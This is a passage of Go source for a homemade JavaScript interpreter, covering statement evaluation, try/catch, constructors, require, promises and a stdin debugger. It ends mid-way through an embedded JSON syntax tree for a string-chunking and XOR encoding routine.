if e, ok := r.(error); ok {
err = e
} else {
err = fmt.Errorf("panic: %v", r)
}
}
}()
fn(ass, dddd)
return nil
}
func Catch(err error, handler func(error)) {
if err != nil {
handler(err)
}
}
func yunxTRY(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.TryStatement)
dtte := object.NewEnv(env)
err := Try(ParseData, &dt.Block, dtte)
Catch(err, func(e error) {
// This is the catch block to handle errors
cadtte := object.NewEnv(env)
dadlcatch := dt.Handler.(*ast.CatchClause)
if dadlcatch.Param != nil {
cadtte.Store.Set(dadlcatch.Param.(*ast.Identifier).Name, &object.StringObject{Value: e.Error()})
}
ParseData(&dadlcatch.Body, cadtte)
})
return &object.NULLObject{}
}
func yunxTHIS(dtt *ast.Statement, env *object.Environment) object.Object {
if env.Type() == token.THIS {
return env
}
if env.Outer != nil {
return yunxTHIS(dtt, env.Outer)
}
return env
}
func yunxNEW(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.NewExpression)
funct := ParseData(&dt.Callee, env)
dbb := []*object.Object{}
for _, hh := range dt.Arguments {
arg := ParseData(hh, env)
dbb = append(dbb, &arg)
}
//if funct.Type() == token.BULLE && dt.Callee.StatementNode() == token.IDENT {
// dasd := dt.Callee.(*ast.Identifier)
// if dasd.Name == token.Promise {
// ji := ParseData
// return promise.Init(&ji, dbb[0], env)
// }
//
//}
kfunob := (funct).(*object.FunctionDeclarationObject)
kfunob.Args = dbb
fuenv := object.NewEnv(env)
fuenv.TypeInfo = token.THIS
for idx, vkey := range kfunob.Params {
zzkey := (*vkey).(*ast.Identifier).Name
if idx >= len(dbb) {
fuenv.Store.Set(zzkey, &object.NULLObject{})
continue
}
fuenv.Store.Set(zzkey, *dbb[idx])
}
if kfunob.IsNative == 1 {
kfunob.Env = fuenv
return (*kfunob.NativeBody)(kfunob)
} else {
ParseData(&kfunob.Body, fuenv)
}
return fuenv
}
func Promise(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
dbb := dt[0]
ji := ParseData
env := myfun.Env
return promise.Init(&ji, dbb, env)
}
func Wait(myfun *object.FunctionDeclarationObject) object.Object {
promise.Done()
return &object.NULLObject{}
}
func ParseData(dtt *ast.Statement, env *object.Environment) object.Object {
if *dtt == nil {
return nil
}
Leix := (*dtt).StatementNode()
//fmt.Println(Leix)
switch Leix {
case token.Bin:
return yunxBin(dtt, env)
case token.Unary:
return yunxUnary(dtt, env)
case token.INT:
return yunxINT(dtt)
case token.Stri:
return yunxStr(dtt)
case token.VAR:
return yunxVar(dtt, env)
case token.IDENT:
return yunxIDENT(dtt, env)
case token.Ass:
return yunxAss(dtt, env)
case token.IfStat:
return yunxIfStat(dtt, env)
case token.ForS:
return yunxFOR(dtt, env)
case token.ForI:
return yunxFOI(dtt, env)
case token.Block:
return yunxBlock(dtt, env)
case token.BREAK:
return yunxBleak(dtt, env)
case token.CONTINUE:
return yunxCONTINUE(dtt, env)
case token.ArrayE:
return yunxArrayE(dtt, env)
case token.TRY:
return yunxTRY(dtt, env)
case token.Debug:
for {
fmt.Printf("断点中:")
scanner := bufio.NewScanner(os.Stdin)
// 读取输入
scanner.Scan()
input := scanner.Text()
input = strings.TrimSpace(input)
// 检查是否有错误
if err := scanner.Err(); err != nil {
fmt.Println("读取输入时发生错误:", err)
return nil
}
zl := ""
if len(input) >= 2 && input[1:2] == ":" {
zl = input[0:1]
input = input[1:]
} else if len(input) > 0 {
zl = "w"
}
if zl == "c" {
return nil
} else if zl == "w" {
sz := EvalTG(input+";", env)
fmt.Println(sz)
}
}
return nil
case token.Member:
return yunxMember(dtt, env)
case token.Object:
return yunxObject(dtt, env)
case token.FuncD:
return yunxFuncD(dtt, env)
case token.FuncE:
return yunxFuncE(dtt, env)
case token.Call:
return yunxCall(dtt, env)
case token.RETURN:
return yunxRETURN(dtt, env)
case token.THIS:
return yunxTHIS(dtt, env)
case token.NEW:
return yunxNEW(dtt, env)
}
return nil
}
func findKey(key string, env *object.Environment) object.Object {
value, ok := env.Store.Get(key)
if ok {
return value
}
shanc := env.Outer
if shanc == nil {
return &object.NULLObject{}
}
return findKey(key, shanc)
}
func setKey(key string, value object.Object, env *object.Environment) object.Object {
_, ok := env.Store.Get(key)
if ok {
env.Store.Set(key, value)
return value
}
shanc := env.Outer
if shanc == nil {
env.Store.Set(key, value)
return value
}
return setKey(key, value, shanc)
}
func EvalDDD(myfun *object.FunctionDeclarationObject) object.Object {
// 参数一: js代码
// 参数二: this环境
dt := myfun.Args
code := (*dt[0]).(*object.StringObject).Value + ";"
dsf := (*dt[1]).(*object.Environment)
dtfg := lexer.New(code)
kk := (*dtfg).Input()
fff := parse.NewParse(kk)
var ff object.Object
for _, dtee := range fff {
ff = ParseData(dtee, dsf)
}
if ff == nil {
return &object.NULLObject{}
}
return ff
}
//func getCyDt(this js.Value, inputs []js.Value) interface{} {
// jii := inputs[0].String()
// alldt, _ := allenv.Store.Get("startFun")
// kd := alldt.(*object.FunctionDeclarationObject)
// env := object.NewEnv(allenv)
// env.Store.Set("cbu", &object.StringObject{Value: jii})
// allenv.Store.Set("l", &object.StringObject{Value: jii})
//
// ParseData(&kd.Body, env)
//
// return js.ValueOf("data in window.cydata")
//}
//
//func registerCallbacks() {
// js.Global().Set("getCyDt", js.FuncOf(getCyDt))
//}
func Require(myfun *object.FunctionDeclarationObject) object.Object {
dte := myfun.Args
daoirfile := (*dte[0]).ToString()
if daoirfile[len(daoirfile)-3:] != ".js" {
daoirfile += ".js"
}
dsdaskj, okk := requireall.DtInfo[daoirfile]
if okk {
return dsdaskj
}
requireall.IsDo = daoirfile
code := require.ReadFile(daoirfile)
env := object.NewEnv(nil)
dt := lexer.New(code)
kk := (*dt).Input()
fff := parse.NewParse(kk)
StartEval(fff, env)
requireall.IsDo = ""
requireall.DtInfo[daoirfile] = env
return env
}
var allenv *object.Environment
var requireall *require.RequireInfo
func new_Func(ddd *func(*object.FunctionDeclarationObject) object.Object) object.Object {
d := &object.FunctionDeclarationObject{IsNative: 1, NativeBody: ddd}
return d
}
func StartEval(data []*ast.Statement, env *object.Environment) object.Object {
ghsa, qbhj := banding.Init()
for key, dsd := range ghsa {
env.Store.Set(key, dsd)
}
eval := EvalDDD
require := Require
promise := Promise
wait := Wait
env.Store.Set(token.Eval, new_Func(&eval))
env.Store.Set(token.Require, new_Func(&require))
env.Store.Set(token.Promise, new_Func(&promise))
env.Store.Set(token.Wait, new_Func(&wait))
var dddcbbbb object.Object
allenv = env
env.TypeInfo = token.THIS
for key, vlu := range qbhj {
//env.Store[key] = vlu
env.Store.Set(key, vlu)
}
for _, dt := range data {
dddcbbbb = ParseData(dt, env)
}
//registerCallbacks()
if dddcbbbb != nil {
fmt.Println(dddcbbbb.ToString())
}
return dddcbbbb
}
func Eval(code string) object.Object {
if requireall == nil {
requireall = &require.RequireInfo{DtInfo: map[string]*object.Environment{}}
}
env := object.NewEnv(nil)
promise.CyJSInit()
dt := lexer.New(code)
kk := (*dt).Input()
fff := parse.NewParse(kk)
//registerCallbacks()
gg := StartEval(fff, env)
promise.Done()
return gg
}
func EvalTG(code string, env *object.Environment) object.Object {
dt := lexer.New(code)
kk := (*dt).Input()
fff := parse.NewParse(kk)
//registerCallbacks()
gg := StartEval(fff, env)
return gg
}
func EvalDt() object.Object {
encodedText := `{"Body":[{"Id":{"Name":"data","PAIX":-1,"TypeInfo":"aaaaa"},"Params":[{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"strList","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"i","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"cd","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"vhh","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Test":{"Left":{"Name":"vhh","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Name":"cd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"\u003e=","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Token":"var","Declarations":[{"Name":"t1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"slice","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"i2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Right":{"Name":"cd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"-","PAIX":0,"TypeInfo":"yyy"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Left":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":" ","PAIX":0,"TypeInfo":"ooooo"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Token":"var","Declarations":[{"Name":"a1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a3","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a4","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"hj","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[{"Name":"a1","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a2","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a3","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a4","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"strList","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"hj","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},{"PAIX":0,"TypeInfo":"break"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"},{"Token":"var","Declarations":[{"Name":"t1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"slice","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a3","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a4","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"hj","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[{"Name":"a1","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a2","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a3","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a4","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"strList","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"hj","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Argument":{"Name":"strList","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"return"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"iiiiiiii"},{"Id":{"Name":"startFun","PAIX":-1,"TypeInfo":"aaaaa"},"Params":[{"Name":"cbu","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Left":{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Name":"cbu","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Left":{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":"cbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbb","PAIX":0,"TypeInfo":"ooooo"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Token":"var","Declarations":[{"Name":"lsbl1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Id":null,"Params":[],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"kf","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"data","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cbb_a","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"kf","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"ks","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Callee":{"Name":"Promise","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"lsbl1","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"new"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"ks2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"ks","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"then","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Id":null,"Params":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Init":{"Token":"var","Declarations":[{"Name":"i","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Init":{"Token":"var","Declarations":[{"Name":"i2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"==","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"PAIX":0,"TypeInfo":"continue"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"},{"Token":"var","Declarations":[{"Name":"allcd","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":20,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":10,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Test":{"Left":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":340,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003e","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":80,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"},{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Caller":{"Name":"cbb_b","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"